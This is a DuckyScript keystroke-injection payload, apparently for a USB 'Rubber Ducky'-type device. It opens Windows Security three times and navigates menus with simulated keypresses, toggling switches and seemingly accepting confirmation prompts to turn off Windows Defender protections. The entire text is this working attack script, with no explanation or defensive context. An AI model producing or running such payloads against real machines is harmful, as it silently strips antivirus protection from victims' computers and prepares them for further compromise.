DELAY 100
REM Open Windows Defender Settings
CTRL ESC
DELAY 500
STRING windows security
DELAY 500
ENTER
DELAY 500
DOWN
DELAY 100
ENTER
DELAY 500
DOWN
DOWN
LEFT
RIGHT
ENTER
DELAY 500
DOWN
SHIFT SPACE
DELAY 500
LEFT
SHIFT SPACE
DELAY 200
ALT F4
CTRL ESC
DELAY 500
STRING windows security
DELAY 500
ENTER
DELAY 500
DOWN
DELAY 200
ENTER
DELAY 500
UP
UP
ENTER
DELAY 500
DOWN
SHIFT SPACE
DELAY 500
LEFT
SHIFT SPACE
DELAY 200
ALT F4
DELAY 500
CTRL ESC
DELAY 500
STRING windows security
DELAY 500
ENTER
DELAY 500
DOWN
DELAY 500
ENTER
DELAY 200
TAB	
DELAY 200
ENTER
DELAY 500
TAB
SHIFT SPACE
DELAY 500
LEFT
SHIFT SPACE
DELAY 200
ALT F4



